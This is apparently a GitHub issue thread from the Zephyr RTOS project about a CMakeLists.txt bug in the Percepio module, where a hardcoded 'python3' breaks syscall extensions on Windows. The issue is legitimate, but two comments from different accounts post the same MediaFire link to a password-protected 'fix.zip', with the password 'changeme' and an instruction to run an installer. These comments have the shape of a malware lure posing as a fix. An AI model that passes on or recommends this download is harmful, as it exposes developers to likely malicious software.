### ISSUE TITLE
v3.7-branch: modules: percepio: Fix python executable name in CMakeLists.txt

### ISSUE THREAD

**Issue by eriktamlin** [zephyrproject-rtos/zephyr#77545]
**Describe the bug**
When using syscall extensions (to optimize tracing of syscalls) CMakeLists.txt for the percepio module calls on python3 using static name instead of using environment variable ${PYTHON_EXECUTABLE}.

**To Reproduce**
Run on Windows and enable syscall extensions.

**Expected behavior**
Enabling syscall extensions. No errors.

**Impact**
Syscall extensions cannot be used on Windows.

**Logs and console output**

**Environment (please complete the following information):**
 - OS: Windows

**Additional context**
This issue is going to be used to backport https://github.com/zephyrproject-rtos/zephyr/pull/77544 to 3.7 once that is approved.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
